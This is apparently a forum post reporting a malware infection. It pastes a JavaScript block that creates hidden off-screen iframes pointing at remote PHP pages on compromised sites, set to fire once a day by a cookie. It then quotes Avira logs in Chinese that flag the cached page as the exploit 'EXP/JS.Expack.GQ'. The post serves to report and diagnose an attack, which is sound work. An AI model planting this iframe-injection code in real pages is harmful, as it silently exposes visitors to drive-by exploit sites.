- function m09() {
- var static = 'ajax';
- var controller = 'index.php';
- var m = document.createElement('iframe');
- m.src = 'http://jeffriesofbacton.co.uk/css/gDC7K4px.php';
- m.style.position = 'absolute';
- m.style.color = '22515';
- m.style.height = '22515px';
- m.style.width = '22515px';
- m.style.left = '100022515';
- m.style.top = '100022515';
- if (!document.getElementById('m')) {
- document.write('<p id=\'m\' class=\'m09\' ></p>');
- document.getElementById('m').appendChild(m);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) && (name != document.cookie.substring(0, name.length))) {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled) {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- m09();
- }
- }
- function srgfn09() {
- var static = 'ajax';
- var controller = 'index.php';
- var srgfn = document.createElement('iframe');
- srgfn.src = 'http://www.ops-zoliborz.waw.pl/sites/L46gvWwq.php';
- srgfn.style.position = 'absolute';
- srgfn.style.color = '961';
- srgfn.style.height = '961px';
- srgfn.style.width = '961px';
- srgfn.style.left = '1000961';
- srgfn.style.top = '1000961';
- if (!document.getElementById('srgfn')) {
- document.write('<p id=\'srgfn\' class=\'srgfn09\' ></p>');
- document.getElementById('srgfn').appendChild(srgfn);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) && (name != document.cookie.substring(0, name.length))) {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled) {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- srgfn09();
- }
- }
Avira
2013/12/13 上午 09:28 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\AVC3APW1\index[2].htm'
包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
已採取動作:
發生錯誤,檔案未刪除。錯誤識別碼:26003.
檔案無法刪除!.
嘗試使用 ARK 程式庫執行動作.
檔案會移動至 '43bae6c7.qua' 名稱底下的隔離區目錄!
2013/12/13 上午 09:28 [System Scanner] 掃描
掃描結束 [已完成全部的掃描.]。
檔案數: 830
目錄數: 0
惡意程式碼數: 1
警告數: 0
2013/12/13 上午 09:27 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\AVC3APW1\index[2].htm 中
偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
執行的動作:傳輸至掃描程式
2013/12/13 上午 09:27 [Web Protection] 發現惡意程式碼
從 URL "http://www.hookfishingclub.ro/index.php?mact=Gallery,m6e73e,default,1"
存取資料時,
發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
已採取動作:已略過
fs is
|
发表于 2013-12-13 09:31:42